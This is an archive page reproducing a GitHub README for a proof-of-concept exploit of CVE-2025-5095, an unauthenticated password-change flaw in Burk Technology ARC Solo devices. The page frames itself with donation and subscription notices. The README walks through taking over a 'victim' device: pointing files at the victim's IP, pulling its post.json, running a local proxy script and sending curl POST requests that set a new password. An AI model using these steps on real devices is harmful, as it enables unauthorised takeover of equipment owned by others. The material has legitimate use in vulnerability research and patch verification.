Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1310 CNY

100%
Buy Us a Coffee

CVE-2025-5095 PoC — Burk Technology ARC Solo Missing Authentication for Critical Function

Source
https://github.com/TeteuXD2/CVE-2025-5095-POC
Associated Vulnerability
Title:Burk Technology ARC Solo Missing Authentication for Critical Function (CVE-2025-5095)
Description:Burk Technology ARC Solo's password change mechanism can be utilized without proper authentication procedures, allowing an attacker to take over the device. A password change request can be sent directly to the device's HTTP endpoint without providing valid credentials. The system does not enforce proper authentication or session validation, allowing the password change to proceed without verifying the request's legitimacy.
Description
Python POC for CVE-2025-5095
Readme
How To Use:

Open Login.htm and edit the places where IP:PORT is to the victim address

<img width="1134" height="466" alt="image" src="https://github.com/user-attachments/assets/107a5515-1c32-4404-b19c-ca382ff6eeb3" />

Edit the var LoginVersion = "Check On The Victim Site"; part to the victim page version, by this, you can visit the victim page and view as source
**WARNING: THIS CVE ONLY WORKS ON VERSIONS OLDER THAN 1.0.60**

<img width="506" height="112" alt="image" src="https://github.com/user-attachments/assets/9ab72bc9-f7d8-4538-8aac-d52ffcfd422b" />

Download the post.json file from the victim site (http://victimip:port/post.json)
Move it to the script folder and you gonna have 3 files

<img width="629" height="86" alt="image" src="https://github.com/user-attachments/assets/c5fe5bb8-b70f-4d58-9132-1b2c6ddab233" />

Now run the python file and access 127.0.0.1:8080/login.htm (If the port 8080 is already in use, you can change by opening the script on a text editor and change the last part)

<img width="574" height="60" alt="image" src="https://github.com/user-attachments/assets/e5d60db5-16a1-4ea2-b649-5153f00addd7" />

*Ignore the alert when opening the login page*

Open A Terminal And use this curl commands, if it prints "success" it worked.

curl -v -X POST http://localhost:8080/post.json -d "UserPassword0=newtestpass"

curl -v -X POST http://localhost:8080/post.json -d "UsersSaveConfig=true"

<img width="1014" height="758" alt="image" src="https://github.com/user-attachments/assets/98e696e9-6443-4bd0-aff9-560bde720c04" />

To check if the page changed, send this command:

curl http://localhost:8080/check_password

Now, visit the victim site (not the localhost one) and insert the new password, on this example, the password is "newtestpass"
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →